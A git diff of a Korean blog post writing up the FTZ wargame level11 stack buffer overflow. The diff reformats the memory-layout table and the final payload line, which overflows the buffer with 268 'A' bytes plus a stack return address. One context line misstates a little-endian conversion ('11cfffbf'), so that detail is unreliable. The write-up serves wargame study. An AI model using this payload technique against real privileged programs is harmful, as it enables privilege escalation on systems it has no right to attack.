--- a/_posts/FTZ/2020-03-12-ftz-level11.md
+++ b/_posts/FTZ/2020-03-12-ftz-level11.md
@@ -69,7 +69,8 @@ main+3 line을 보면 264byte의 공간을 메모리에 할당했을을 알 수 
 main+41 line을 보면 str의 주소는 ebp-264이며 str(256Byte)뒤에 8Byte의 dummy값이 있음을 알 수 있다.  
 
 **메모리 구조**  
----|  
+메모리구조|
+---|
 str(256Byte)
 dummy(8Byte)
 sfp(4Byte)
@@ -111,4 +112,4 @@ ex) 0xbffffc11을 리틀 엔디안 방식으로 저장하면 11cfffbf가 된다.
 <br />
 
 #### 페이로드
-./attackme `python -c "print 'A'*268 + '\x11\xfc\xff\xbf'"`
+./attackme \`python -c "print 'A'*268 + '\x11\xfc\xff\xbf'"\`
